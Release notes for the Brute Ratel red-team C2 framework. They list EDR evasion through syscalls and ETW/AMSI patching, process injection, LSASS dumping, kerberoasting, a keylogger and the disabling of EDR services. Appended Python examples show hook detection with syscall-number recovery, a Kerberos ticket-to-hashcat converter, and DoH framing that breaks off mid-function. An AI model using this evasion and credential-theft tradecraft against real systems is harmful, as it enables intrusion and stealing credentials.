-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Release notes for 1.0 - Sicilian Defense
======================================
Ratel Server and Badger
======================================
Additions
--------------------------------------
1. Added DNS over HTTPS (DoH) payload and listener
2. Added a DoH debug log option. This can be used to enable or disable debug logs to validate that the listener is working. The logs are appended to the server logs
3. Added an HTTP/HTTPS proxy option for DoH and HTTP badgers
4. Added external C2 over Slack
5. Added the 'detect' command to hunt userland hooks in a user-provided DLL
6. Added the 'kerberoast' command and krb5decoder for decoding a KRB5 ticket and converting it to hashcat format
7. Added the 'icmp_ping' command
8. Added the 'wmiexec' command
9. Added a File Explorer in Commander with SMB support
10. Updated Process Explorer with a process search option and disabled sorting. The architecture of each process is also shown now
11. The 'preview' command now uses a syscall to avoid detections when opening the file handle
12. Added export profile support for click_scripts, webhook_listener, autosave, register_dll, register_pe, register_pe_inline and register_obj
13. Renamed the 'wmispawn' command to 'wmiquery'
14. Riot Control supports DoH
15. Updated the MITRE map

Improvements
--------------------------------------
1. Updated SMB pivots to reuse named pipes upon disconnection
2. The 'crisismonitor' command now shows user information on every logon event
3. Replaced Camouflage with phish_creds and removed the Camouflage code from the server
4. Changed the background color of Commander from #000e14 to #161a20
5. Added an option to change the terminal background from the BRc4 image to a black screen
6. Added new encrypt and sleep techniques, which are switched randomly on every sleep
7. The 'ps' and 'psgrep' commands also show the architecture of each process
8. Renamed Warmongers to Operators
9. Commander now saves every payload under a new name as per its payload type, i.e. doh/http/smb/tcp
10. Updated the loader to use a new way of finding the base address of the DLL in memory for reallocation
11. Updated the listener to listen on localhost

======================================
Bug Fixes
======================================
1. Fixed crisis_monitor output formatting, which sometimes returned an extra EOF
2. Fixed a minor printing bug in ipstats
3. Fixed BOF execution to return NULL when an API/DLL is not found due to user error
4. Fixed a shellcode injection bug where artifacts were sometimes left behind. The badger now automatically cleans up the injected shellcode after bootstrapping
5. Fixed Sentinel and LdapSentinel output for hex values
6. Fixed spawned child processes to resume their thread when reflective and shellcode injection fail

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Release notes for 0.9 - Checkmate
======================================
Ratel Server and Badger
======================================
Additions
--------------------------------------
1. Updated multiple sleep functions to use syscalls with waitable objects
2. Upgraded the kernel32 and kernelbase hunters to avoid kernel traps
3. Updated the syscall hunter for various EDRs
4. Added the 'memdump' command
5. Added the 'addpriv' command
6. Added the 'applist' command
7. Added the 'preview' command
8. Added the 'fileinfo' command
9. Added the 'lookup' command
10. Disabled Control Flow Guard where not required
11. Replaced everything in the badger with the Syscall Checkmate Debugger for the following:
    1. NtAllocateVirtualMemory
    2. NtFlushInstructionCache
    3. NtProtectVirtualMemory
    4. NtWriteVirtualMemory
    5. NtCreateSection
    6. NtMapViewOfSection
    7. NtCreateThreadEx
    8. NtQueueApcThread
    9. NtResumeThread
    10. NtAlertResumeThread
    11. NtOpenProcess
    12. NtSetInformationProcess
    13. NtQueryInformationProcess
    14. NtDuplicateObject
    15. NtGetContextThread
    16. NtSetContextThread
    17. NtWaitForSingleObject
    18. NtClose
    19. NtTerminateThread
    20. NtCreateEvent
    21. NtSignalAndWaitForSingleObject
    22. NtCreateTransaction
    23. NtOpenFile
    24. NtCreateFile
    25. NtQuerySystemInformation
    26. NtReadVirtualMemory
    27. NtReadFile
    28. NtQueryInformationFile

======================================
Bug Fixes
======================================
1. Enhanced the user experience for Ldap Sentinel
2. Fixed the Ldap Sentinel bug in the GUI which did not use inline injection when performing manual queries

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Release notes for 0.8.0 - Warfare Tactics
======================================
Ratel Server and Badger
======================================
Additions
--------------------------------------
1. Added webhook functionality and a separate function to write websockets
2. Updated the loader to dynamically find obfuscated syscalls
3. Converted VirtualAlloc in coffexec to obfuscated syscalls
4. Converted all reflective DLL, service and DLL payload generation to use obfuscated indirect syscalls
5. Added EtwTi process instrumentation callback patching for all loaders
6. Added the 'timeloop' command to run a given command in a loop for a given number of iterations and interval in seconds
7. Added new process injection techniques for syscalls:
   set_threadex
      1. NtCreateThreadEx (Obfuscated Indirect Syscalls - x64 only)
      2. NtQueueApcThread, NtResumeThread (Obfuscated Indirect Syscalls - x64 only)
      3. NtQueueApcThread, NtAlertResumeThread (Obfuscated Indirect Syscalls - x64 only)
   set_malloc
      1. NtCreateSection, NtMapViewOfSection, RtlCopyMemory (Obfuscated Indirect Syscalls - x64 only)
      2. NtAllocateVirtualMemory, NtProtectVirtualMemory, NtWriteVirtualMemory (Obfuscated Indirect Syscalls - x64 only)
8. Added a feature to change malleable profiles on the fly. Modified badgers will spawn under a new identity
9. The SwitchC2 feature is removed and replaced with switch_profile
10. Added prepend and append options to the malleable C2 profile

Enhancements
--------------------------------------
1. Added header support for socksbridge (domain fronting)
2. Shellcode parameters passed to the shellcode are now encrypted with RC4
3. Replaced Sleep with WaitForSingleObjectEx

======================================
Bug Fixes
======================================
1. Fixed a rare download bug for TCP and SMB badgers
2. Fixed a token vault display bug

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Release notes for 0.7 - Tsukuyomi
======================================
Ratel Server and Badger
======================================
Additions
--------------------------------------
1. Improved the badger's loader to use NT APIs
2. Added the 'Shadowcloak' feature, rewritten with a custom MinidumpWriteDump
3. Added sleep functionality: the badger encrypts itself while sleeping and changes its RX region to RW
4. Added 'NtCreateSection, NtMapViewOfSection, RtlCopyMemory' to set_malloc for reflective DLL and shellcode execution
5. Added the 'ps_ex' command
6. Added the 'userinfo' command, which displays user privileges and groups. Integrated the 'id' and 'get_privs' commands into 'userinfo'
7. Added the 'scstart' command to start a local or remote service over RPC
8. Added the 'patchetw' command to optionally patch ETW to disable hooks for NtQueueApcThread
9. Added the 'query_session' command for remote session queries
10. Added the 'local_sessions' command
11. Added the 'routes' command
12. Added the 'arp' command
13. Added the 'netstat' command
14. Added the 'shinject_ex' command
15. Added the 'sharescan' command
16. Added the 'schtquery' command to query detailed scheduled tasks
17. Added service description and service trigger information to the 'scquery' command
18. Added the 'sysinfo' and 'windowlist' commands
19. Added the 'getenv' command
20. Added the 'dnscache' command
21. Added the 'passpol' command
22. Added the 'keylogger' command
23. Added the 'Sentinel' command, which can perform LDAP queries without creating a new process
24. Added the die_offline option for badgers to exit if they are unable to connect to the C2

Enhancements
--------------------------------------
1. Updated the 'impersonate' command to select by user ID instead of just usernames
2. The 'ps' command shows more detailed output with module information
3. Updated the 'net' command, which can now query users, groups and members of groups
4. Updated service output with proper response codes as a replacement for errors
5. Replaced multiple msvcrt.dll functions with custom inline functions
6. Downloaded files in the logs directory are now named with the current time and the hostname they were downloaded from
7. Updated Ldap Sentinel for process injection and lowered the size of the RDLL to 18 KB from the earlier 38 KB
8. Added more verbosity to the Ratel war room
9. Replaced the job counter (job-0) with a new line for every command. The badger separates the output of every command by adding a line at the start and one at the end of the output
10. Updated the 'drivers' command to show metadata such as the company name and load address of the driver
11. Updated formatting for the 'wmispawn' command
12. Updated the 'list_modules' command with company name
13. Updated the MITRE graph
14. Updated 'crisis_monitor' to run as an independent thread
15. Updated 'sharpinline' to run as an independent thread
16. Added affected_cmd and supported_cmd for process injection and PPID spoofing

======================================
Bug Fixes
======================================
1. Fixed a badger count issue where logs were loading into the same log for new connections on badger restoration
2. Fixed dynamic resolution of OpenProcess
3. Fixed download for shadowcloak over SMB/TCP pivots
4. Fixed screenshot upload with domain fronting
5. Fixed some bugs in the 'ps' command
6. Fixed memory leaks in the 'download' command
7. Fixed a 'samdump' bug on Server 2012

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Release notes for 0.6.1.2 - Resurrection - Bug Fix
======================================
Bug Fixes
======================================
1. Fixed a bug in sharpinline where .NET v2 assemblies did not run in the v4 CLR. Both v2 and v4 .NET code can now run in the v4 CLR; previously an error was returned stating that v2 is not supported in v4.

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Release notes for 0.6.1.1 - Resurrection - Beta Feature Release
======================================
Ratel Server and Badger
======================================
1. Added the scstart command to start local and remote services using the Win32 API

======================================
Bug Fixes
======================================
1. Fixed screenshot download over a fronted domain
2. Fixed process output listing for badgers, which sometimes did not show other users' processes
3. Removed trailing spaces in commands mistakenly added by the user in Commander
4. Added automatic addition of \\ in the 'cd' command

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Release notes for 0.6.1 - Resurrection - Beta Feature Release
======================================
Ratel Server and Badger
======================================
1. Added the shadowcloak feature, which extracts an LSASS dump and reroutes the dump to the server without touching disk

======================================
Bug Fixes
======================================
1. Fixed a badger count issue where logs were loading into the same log for new connections on badger restoration

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Release notes for 0.6.0.3 - Resurrection - Bug Fix
======================================
Bug Fixes
======================================
1. Added a patch to load PNG files instead of JPEG for badgers

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Release notes for 0.6.0.2 - Resurrection - Bug Fix
======================================
Bug Fixes
======================================
1. Fixed Crisis Monitor bugs in finding the attached battery

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Release notes for 0.6.0.1 - Resurrection - Bug Fix
======================================
Bug Fixes
======================================
1. Added ExitProcess to reflective DLLs so that the process does not crash

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Release notes for 0.6 - Resurrection
======================================
Commander
======================================
1. Added random listener name generation during new listener creation
2. Added a Bind IP drop-down box instead of having to enter the IP manually
3. Added an option to auto-select the bind host as the rotational host
4. Added payload generation architecture GUI support to the context menu of a listener and to the payload profiler. Replaced the buttons in the payload profiler with a drop-down box
5. Added search and ldapquery options directly to the badger's terminal
6. Modified the on-screen help output to show affected and supported commands for every command
7. Merged the Scratchpad and Operators/Chat table widgets
8. Added dark faded colors to mark payloads which are dead
9. Added UTC to local date conversion support for last check-in and user activity
10. Added an autohide button which hides all dead badgers. Badgers marked as dead and exited are automatically hidden when this is enabled
11. Removed 'Add URI', since the core listener now allows badgers to connect to any URI while still providing the option to filter the response to specific URIs by adding custom HTML pages to a URI
12. Added Load adjacent tab, exitthread and exitprocess options to the context menu of a badger
13. Modified BadgerQParser to show pending commands. The command queue only shows the main commands in the queue instead of the full command with the file buffer (for file uploads/sharp/ps reflects)
14. Commander now remembers the last used folder for saving files
15. The badger's terminal shows more info; previously it only showed the PID and BID
16. Added an Export to CSV option to User Activity. User Activity shows MITRE mappings along with every command executed
17. Single Commander binary for all Linux distributions

======================================
Ratel Server and Badger
======================================
1. Added position independent code for x86
2. Added x86 reflective DLLs for badger modules
3. Added the Token Vault feature, which can store multiple stolen tokens using the 'grab_token' command
4. Added the Sharpinline command to execute C# code without creating a new process
5. Sharpreflect and Sharpinline now use a randomly generated AppDomain every time instead of the default AppDomain
6. Added 'coffexec', which has extensive support for Cobalt Strike Beacon Object Files.
   Supported internal APIs are BadgerDispatch, BadgerDispatchW, BadgerStrlen, BadgerWcslen, BadgerMemcpy, BadgerMemset, BadgerStrcmp, BadgerWcscmp and BadgerAtoi. The entry point for coffexec is 'coffee'
7. Added the 'list_modules' command to list loaded DLLs in the current or a target process
8. Added the 'list_exports' command to list the exports of a given DLL
9. Added the 'memhunt' command to hunt for memory regions with any page permissions in the current or a target process
10. Added 'suspended_run' to create a new process in a suspended state
11. Added the 'crisis_monitor' feature, which can add an event to monitor changes in power status, user login and logoff, for terminal session monitoring and more
12. Added the 'set_killdate' and 'get_killdate' commands to auto-kill a badger on a given date in RFC822 format
13. Added exit thread and exit process functionality. If shellcode is injected in a process, exitthread only exits the thread and not the full process
14. Added more detailed information to the 'ps' command (process listing)
15. Modified TCP scans to support port-range scanning and print output dynamically
16. AMSI/ETW patching will now only patch if the CLR version is 2.0
17. Removed objexec and get/set_objexec, since coffexec does a better job of executing object files
18. Updated help with supported and affected commands
19. Added a feature to mark dead badgers which do not connect back. This can be used to filter out dead badgers
20. Removed the Adversary Simulations code, since Click Scripts replace the Adversary Simulation option
21. Added badger connection notifications to Socks (Boomerang)
22. During payload/RDLL injection, the badger automatically detects the target architecture (x86 or x64) and generates the payload for that architecture
23. Added logging for psexec, upload and download, which logs the name, path and hashes of every file uploaded or downloaded
24. Added a Brute Ratel sample profile generator and parser, which can be used with the '-sp' option
25. Modified psreflect and sharpreflect with new code. The newly generated code is only 30 KB in size
26. Fixed the 'wmispawn' example in the help options
27. Updated the Go compiler to 'go1.16.6 linux/amd64'
28. Added RC4 encryption support alongside AES256 and RSA to encrypt selected sensitive strings in memory
29. Added an option in the Ratel server to create a sample configuration
30. Command registration in badger profiles has changed: an additional "arch":"x64" or "arch":"x86" field is required in the profile to validate the architecture of the registered payload command
31. The 'dcsync_inject' command is removed, since the 'dcsync' and 'mimikatz' commands can both perform DCSync

======================================
Bug Fixes
======================================
1. Added a fix to change the payload profiler password when the listener password is changed
2. Fixed a bug which always showed 'regular' auth in the listeners table instead of OTA where needed
3. Fixed the download percentage bug in badgers
4. Fixed the spelling mistake 'arguement' in the terminal commands; it now reads 'argument'

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Release notes for 0.5.0.3 - Syndicate
======================================
Bug Fixes
======================================
1. Fixed a 'Camouflage' bug where Camouflage was not getting injected due to changes in the PE header
2. Fixed a bug in the 'autosave' feature which printed 'profile not saved' even after saving the configuration file
3. Fixed a POST response bug for deauthenticated badgers and the custom root page
4. Fixed socksbridge crashing on an extremely long User-Agent

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Release notes for 0.5 - Syndicate
======================================
Commander
======================================
1. Modified the user interface to make it a smoother experience for the user. Moved Downloads, LdapSentinel, AdvSim and other UI elements to dock widgets
2. Added a Watchlist window for logging events, web activity, operator activity and the chat window. Removed the 'Archives' tab and integrated 'Downloads' and 'View Logs' as separate tabs
3. Modified the user interface for Ldap Sentinel
4. Added the Click Scripting feature to automate execution of badger commands in bulk
5. Removed samdump, shadowclone and other one-click tasks from the badger's right-click menu, since these are one-click commands which can be executed directly from the badger's terminal or from Riot Control
6. Error pop-up boxes are now shown as text in the UI instead
7. Added PowerShell payload generation capability, accessible from Commander's payload profiler or by right-clicking a listener
8. Added splitters to resize dock widgets
9. Added the Downloads broadcast feature. As soon as new files are downloaded, the Downloads tab pops up automatically
10. Added an 'Autosave' button to automate saving of Brute Ratel's configuration file. All badger initialization information is stored in the config file, including the tokens used by badgers for authentication
11. Statistics are now shown in the bottom right part of the page

======================================
Ratel Server and Badger
======================================
1. Added a custom exported function hunter as a replacement for GetProcAddress. None of the badger commands use GetProcAddress anymore
2. Added PowerShell payload generation capability, accessible from Commander's payload profiler or by right-clicking a listener
3. Added 'pivot_winrm' functionality, which can be used to pivot across systems using WinRM without dropping any payload to disk. Badgers using pivot_winrm are executed in memory
4. Added the WMISpawn feature, which can be configured with a custom WMI namespace and user credentials to run WMI queries in memory without creating any new process
5. Ported Ldap Sentinel from clang to mingw. Reduced the size of the reflective DLL in memory from 245 KB to 38 KB
6. Added a 'raw query' mode for Ldap Sentinel, which can be used to perform raw LDAP queries
7. Ported 'mimikatz' functionality. Mimikatz can be loaded with the badger's loader with stripped PE sections to avoid detection in memory
8. Brute Ratel contains two customized versions of DCSync, one which uses tokens generated from passwords and one which uses process tokens. Both work independently of the 'mimikatz' command
9. Added portscan functionality to scan a given host for multiple port numbers
10. Added a share enumeration feature which takes a hostname, checks for privileges on the host and shows the available shares
11. Added AMSI patching and EtwEventWrite patching to the psreflect and sharpreflect commands; fixed the .NET CLR loading prompt for CLR 2.0 in psreflect/sharpreflect
12. Added a new x64 loader for RW+RX permissions. Modified the shellcode for VirtualAlloc+CreateThread. All reflective loaders were rewritten from scratch to avoid leaving any artefacts in memory
13. Added the Click Scripting feature to load commands from a JSON file to automate execution of badger commands in bulk
14. Modified the 'upload' command for enhanced upload speed

======================================
Bug Fixes
======================================
1. Fixed a registry query for REG_BINARY which did not return a binary text response
2. Fixed a bug where 'rootpage' was unable to load a custom root page on the base URL of a listener
3. Fixed shellcode crashing on older Windows 7 versions which did not have combase.dll. Replaced the combase.dll functions with their ole32.dll equivalents for Windows 7, Server 2012 and Server 2008

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Release notes (minor update) for 0.4.2 - Chaos Theory
======================================
Ratel Server and Badger
======================================
1. Brute Ratel can now block non-Microsoft DLLs from loading into the injected process. The dll_block and dll_unblock commands respectively enable and disable DLL blocking in remote processes

======================================
Bug Fixes
======================================
1. The SMB pipe name in the Edit Payload Profiler used to have "\\.\pipe\" prepended automatically. From this release it is no longer added. This only applies to the Edit Payload Profile option
2. Earlier, listener names could contain spaces, but this broke the payload profiler, which did not accept spaces. From this release, spaces in a listener name are automatically replaced with a hyphen
3. Fixed a bug in the graphing script which loaded the graphs for the listeners incorrectly

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Release notes for 0.4.1 - Chaos Theory
======================================
Commander
======================================
1. Added the Adversary Simulation UI to Commander. Commander can load a simulation config from a JSON file via the Ratel server to load a set of commands for simulation. A sample configuration file and artefacts for the APT33 group are stored in the simulations directory
2. HTTP payloads can now be generated directly by right-clicking a listener. For every new listener created, a new payload profile is automatically added to the payload profilers list
3. Listener creation has a direct option to add a user agent, extra headers for the payload and rotational redirectors
4. Moved listener auth to right-click of listener -> listener actions -> view authentication
5. Pressing Enter on the username/password page moves to the next field, and the login button now accepts Enter

======================================
Ratel Server and Badger
======================================
1. Added the Adversary Simulation profiler. A user can create a JSON-based simulation profile which includes commands to simulate a threat actor
2. SSL keys are now mandatory in the command-line parser
3. Changed the 'driver list' command to 'drivers'
4. Added several process injection and memory allocation techniques. The new commands 'set_malloc/get_malloc' and 'set_threadex/get_threadex' can be used to change memory allocation and execution artefacts.
   - Memory allocation for process injection
     - VirtualAllocEx, WriteProcessMemory
     - NtCreateSection, NtMapViewOfSection, RtlCopyMemory
   - Thread execution for allocated memory
     - CreateRemoteThread
     - RtlCreateUserThread
     - QueueUserAPC, ResumeThread
     - QueueUserAPC, NtResumeThread
     - QueueUserAPC, NtAlertResumeThread
     - NtQueueApcThread, ResumeThread
     - NtQueueApcThread, NtResumeThread
     - NtQueueApcThread, NtAlertResumeThread
5. Added the 'scdivert' feature, which can change the service binary path of an existing service. An EDR's service configuration can be changed and the system rebooted to disable the EDR altogether. This only works for EDRs which do not monitor their own registry keys for changes
6. Added the 'psgrep' feature, which searches the process list and returns only a specific process. The 'ps' command still exists if you want to look at all processes. This feature was added to quickly find a process and inject shellcode or a payload into it
7. Added the 'ipstats' feature, which returns more detailed output than Windows' 'ipconfig'. This command returns network-related information including the names of VPN adapters, their IP addresses, gateways and other DNS/adapter information
8. Added the contact_harvester command to extract and dump contacts from Outlook's Global Address List
9. Updated the server conf sample profile in the server_confs folder
10. Creating a new listener via a profile file or via the GUI now automatically creates a payload profile for the same listener
11. Brute Ratel is now built separately for Kali and Ubuntu, since Kali has the latest C++ libraries. Both versions are in the Brute Ratel directory with the same naming convention

======================================
Bug Fixes
======================================
1. Fixed an Android handler bug in reading Unicode output from the Ratel server's websocket
2. Fixed a Commander handler bug in reading Unicode output from the Ratel server's websocket
3. Fixed a Ratel server bug in reading Unicode output from badger HTTP requests
4. Fixed error handling in the Ratel server. Input is parsed in a more optimized and faster way
5. Fixed a Ratel server crash in error handling
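The 1.0 'detect' command hunts userland hooks in a user-provided DLL, and the 0.8/0.9 entries refer to a syscall hunter that keeps working when EDRs have patched the ntdll stubs. The following is an added example, not Brute Ratel's code, showing on constructed x64 ntdll-style stubs what both of those checks boil down to: comparing each export's in-memory prologue with the on-disk copy to find an inline JMP hook and decode where it goes, and then recovering the syscall number (SSN) for a hooked stub either from a clean neighbouring stub (the Halo's Gate approach) or from the sort order of the Zw* exports (the SysWhispers2 approach). Addresses, SSN values and the "EDR trampoline" are all made up for the example; real SSNs differ between Windows builds, which is exactly why they have to be resolved at run time.

```python
"""Userland hook detection and syscall-number (SSN) recovery over constructed
x64 ntdll-style stubs. Added example, not Brute Ratel code."""
import struct

STUB_SIZE = 32                       # x64 ntdll Zw* stubs are laid out 32 bytes apart
CLEAN_PREFIX = b"\x4c\x8b\xd1\xb8"   # mov r10, rcx ; mov eax, <SSN>
TRAILER = b"\xf6\x04\x25\x08\x03\xfe\x7f\x01\x75\x03\x0f\x05\xc3"  # test/jne/syscall/ret

# Constructed layout: an ntdll stub area and an "EDR" DLL that hooks two stubs.
# SSNs are illustrative (0..7 in address order); real values change per build.
NTDLL_STUBS = 0x7FFD5C3ED000
EDR_TRAMPOLINE = 0x7FFD5C601000
NAMES = ["ZwClose", "ZwAllocateVirtualMemory", "ZwOpenProcess", "ZwMapViewOfSection",
         "ZwWriteVirtualMemory", "ZwProtectVirtualMemory", "ZwQueueApcThread", "ZwCreateThreadEx"]


def clean_stub(ssn):
    """Clean stub with the byte layout of a Windows 10+ x64 syscall stub."""
    return (CLEAN_PREFIX + struct.pack("<I", ssn) + TRAILER).ljust(STUB_SIZE, b"\xcc")


def jmp_hooked_stub(ssn, stub_addr, hook_addr):
    """The same stub after an EDR wrote an E9 rel32 inline hook over its first 5 bytes."""
    rel32 = (hook_addr - (stub_addr + 5)) & 0xFFFFFFFF
    return b"\xe9" + struct.pack("<I", rel32) + clean_stub(ssn)[5:]


def build_tables(hooked):
    """Return (disk, mem) maps of name -> (address, stub bytes). `disk` is what the
    DLL file contains, `mem` what is mapped in the process; `hooked` maps a name
    to the address its hook jumps to."""
    disk, mem = {}, {}
    for ssn, name in enumerate(NAMES):
        addr = NTDLL_STUBS + ssn * STUB_SIZE
        disk[name] = (addr, clean_stub(ssn))
        if name in hooked:
            mem[name] = (addr, jmp_hooked_stub(ssn, addr, hooked[name]))
        else:
            mem[name] = (addr, clean_stub(ssn))
    return disk, mem


def jmp_target(addr, stub):
    """Decode an E9 rel32 at the start of a stub; None when it does not begin with a jmp."""
    if stub[0] != 0xE9:
        return None
    return addr + 5 + struct.unpack("<i", stub[1:5])[0]


def find_hooks(disk, mem):
    """Compare each in-memory export prologue with its on-disk copy (the check a
    'detect'-style command performs); return name -> jmp target for modified stubs."""
    return {name: jmp_target(addr, stub)
            for name, (addr, stub) in mem.items() if stub != disk[name][1]}


def ssn_from_stub(stub):
    """SSN from a clean stub (immediate of `mov eax, imm32`), or None if the prologue is gone."""
    if not stub.startswith(CLEAN_PREFIX):
        return None
    return struct.unpack("<I", stub[4:8])[0]


def recover_ssn(mem, name):
    """Halo's Gate style: when the stub is hooked, walk neighbouring stubs up and
    down in STUB_SIZE steps until a clean one is found and correct by the distance."""
    by_addr = {addr: stub for addr, stub in mem.values()}
    addr = mem[name][0]
    ssn = ssn_from_stub(by_addr[addr])
    if ssn is not None:
        return ssn
    for k in range(1, len(by_addr)):
        for direction in (1, -1):
            neighbour = by_addr.get(addr + direction * k * STUB_SIZE)
            if neighbour is None:
                continue
            nb_ssn = ssn_from_stub(neighbour)
            if nb_ssn is not None:
                return nb_ssn - direction * k
    return None


def ssn_by_sort_order(mem):
    """SysWhispers2 style: Zw* exports are laid out in SSN order, so the index of a
    stub after sorting the exports by address is its SSN, regardless of stub bytes."""
    return {name: i for i, name in enumerate(sorted(mem, key=lambda n: mem[n][0]))}


if __name__ == "__main__":
    disk, mem = build_tables({"ZwAllocateVirtualMemory": EDR_TRAMPOLINE,
                              "ZwOpenProcess": EDR_TRAMPOLINE + 0x40})
    for name, target in find_hooks(disk, mem).items():
        print("hooked: %-26s jmp -> 0x%x" % (name, target))
    for name in NAMES:
        print("%-26s ssn=%d (sorted: %d)" % (name, recover_ssn(mem, name), ssn_by_sort_order(mem)[name]))
```

Against a real process the two tables come from reading the DLL file from disk and reading the mapped image out of the process, and the export list has several hundred entries; the comparison and the two recovery strategies are unchanged. The neighbour walk also has to skip neighbours that are hooked themselves, which is why it keeps stepping outward rather than stopping at the first adjacent stub.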
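The 1.0 'kerberoast' entry above mentions a krb5decoder that decodes a KRB5 ticket and converts it to hashcat format. As an added example (not Brute Ratel's decoder), the block below does that conversion end to end on a constructed Ticket: it builds the DER structure from RFC 4120 (Ticket ::= [APPLICATION 1] SEQUENCE { tkt-vno, realm, sname, enc-part }), decodes it back with a minimal TLV walker, and emits the `$krb5tgs$` line in the layout hashcat expects, which is the same layout impacket's GetUserSPNs writes: for RC4 (etype 23) the first 16 bytes of the cipher are the HMAC-MD5 checksum and go in the first field; for AES (etype 17/18) the checksum is the last 12 bytes. The realm, SPN and cipher bytes are made up; a real decoder would pull the Ticket out of the TGS-REP the KDC returned.

```python
"""Decode a Kerberos Ticket (as carried in a TGS-REP) and emit the hashcat
krb5tgs line. Added example, not Brute Ratel's krb5decoder; the DER helpers
are minimal and the sample ticket is constructed."""


# --- minimal DER encode/decode ------------------------------------------------
def der(tag, content):
    n = len(content)
    if n < 0x80:
        length = bytes([n])
    else:
        lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(lb)]) + lb
    return bytes([tag]) + length + content


def der_int(n):
    return der(0x02, n.to_bytes((n.bit_length() + 8) // 8, "big", signed=True))


def tlv(buf, pos=0):
    """Read one TLV at pos -> (tag, value, next_pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        k = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + k], "big"), pos + k
    return tag, buf[pos:pos + length], pos + length


def children(buf):
    """All (tag, value) pairs inside a constructed value."""
    out, pos = [], 0
    while pos < len(buf):
        tag, val, pos = tlv(buf, pos)
        out.append((tag, val))
    return out


# --- building a constructed Ticket (RFC 4120 section 5.3) ----------------------
def principal_name(names, name_type=2):                          # 2 = NT-SRV-INST
    strings = b"".join(der(0x1B, n.encode()) for n in names)   # 0x1B = GeneralString
    return der(0x30, der(0xA0, der_int(name_type)) + der(0xA1, der(0x30, strings)))


def sample_ticket(etype, cipher, realm="CORP.LOCAL",
                  sname=("MSSQLSvc", "sql01.corp.local:1433"), kvno=2):
    """Ticket ::= [APPLICATION 1] SEQUENCE { tkt-vno [0], realm [1], sname [2], enc-part [3] }."""
    enc_part = der(0x30, der(0xA0, der_int(etype)) + der(0xA1, der_int(kvno))
                   + der(0xA2, der(0x04, cipher)))
    body = (der(0xA0, der_int(5)) + der(0xA1, der(0x1B, realm.encode()))
            + der(0xA2, principal_name(list(sname))) + der(0xA3, enc_part))
    return der(0x61, der(0x30, body))


# --- decoding ------------------------------------------------------------------
def parse_ticket(raw):
    """Return (realm, service principal 'a/b', etype, cipher) from a DER Ticket."""
    tag, body, _ = tlv(raw)
    if tag != 0x61:
        raise ValueError("not a Kerberos Ticket ([APPLICATION 1])")
    fields = {t & 0x1F: v for t, v in children(tlv(body)[1])}   # context tags [0]..[3]
    realm = tlv(fields[1])[1].decode()
    name_string = children(tlv(fields[2])[1])[1][1]              # sname.name-string [1]
    spn = "/".join(v.decode() for _, v in children(tlv(name_string)[1]))
    enc = {t & 0x1F: v for t, v in children(tlv(fields[3])[1])}
    etype = int.from_bytes(tlv(enc[0])[1], "big", signed=True)
    cipher = tlv(enc[2])[1]
    return realm, spn, etype, cipher


def to_hashcat(user, realm, spn, etype, cipher):
    """hashcat krb5tgs line. etype 23: first 16 cipher bytes are the HMAC-MD5
    checksum; etype 17/18: the last 12 bytes are the truncated HMAC-SHA1."""
    spn = spn.replace(":", "~")
    if etype == 23:
        return "$krb5tgs$23$*%s$%s$%s*$%s$%s" % (user, realm, spn,
                                                 cipher[:16].hex(), cipher[16:].hex())
    if etype in (17, 18):
        return "$krb5tgs$%d$%s$%s$*%s*$%s$%s" % (etype, user, realm, spn,
                                                 cipher[-12:].hex(), cipher[:-12].hex())
    raise ValueError("unsupported etype %d" % etype)


def ticket_to_hashcat(user, raw):
    realm, spn, etype, cipher = parse_ticket(raw)
    return to_hashcat(user, realm, spn, etype, cipher)


if __name__ == "__main__":
    raw = sample_ticket(23, bytes(range(64)))      # constructed, not a real ticket
    print(ticket_to_hashcat("svc_sql", raw))
```

The user name is not inside the Ticket (the service account is known from the SPN lookup that preceded the TGS request), which is why it is passed in separately; hashcat ignores it for cracking but keeps it in the line for bookkeeping. The ':' to '~' substitution in the SPN keeps the port out of the way of hashcat's field separator handling.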
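Release 1.0 above adds a DNS over HTTPS payload and listener plus a DoH debug log to confirm the listener is receiving queries. The following added example, which is not Brute Ratel's transport code, shows the framing such a channel rides on, RFC 8484 `application/dns-message`: the client builds a plain DNS TXT query, sends it either as the unpadded base64url `dns=` parameter of a GET or as the raw body of a POST, and the server answers with an ordinary DNS response whose TXT record carries the data. Both directions are parsed and built here with constructed names and payloads; real DoH traffic additionally sits inside TLS, which this block does not model.

```python
"""RFC 8484 DNS-over-HTTPS framing for a TXT lookup: build the DNS query, wrap
it as a DoH GET (base64url, unpadded) or POST, and parse the TXT answer.
Added example, not Brute Ratel's DoH listener; names and data are constructed."""
import base64
import struct

TXT = 16
IN = 1


def encode_name(name):
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode() for l in labels) + b"\x00"


def build_query(name, qtype=TXT, txid=0x1234):
    """DNS query with RD set and one question (what the client side sends)."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack(">HH", qtype, IN)


def doh_get_path(msg, path="/dns-query"):
    """GET form: the DNS message is the 'dns' parameter, base64url without padding."""
    return "%s?dns=%s" % (path, base64.urlsafe_b64encode(msg).decode().rstrip("="))


def decode_doh_get(path):
    """Listener side of GET: recover the DNS message from the 'dns' parameter."""
    param = path.split("dns=", 1)[1].split("&", 1)[0]
    return base64.urlsafe_b64decode(param + "=" * (-len(param) % 4))


def doh_post_request(msg, host, path="/dns-query"):
    """POST form: the raw DNS message is the body, typed application/dns-message."""
    head = ("POST %s HTTP/1.1\r\nHost: %s\r\nAccept: application/dns-message\r\n"
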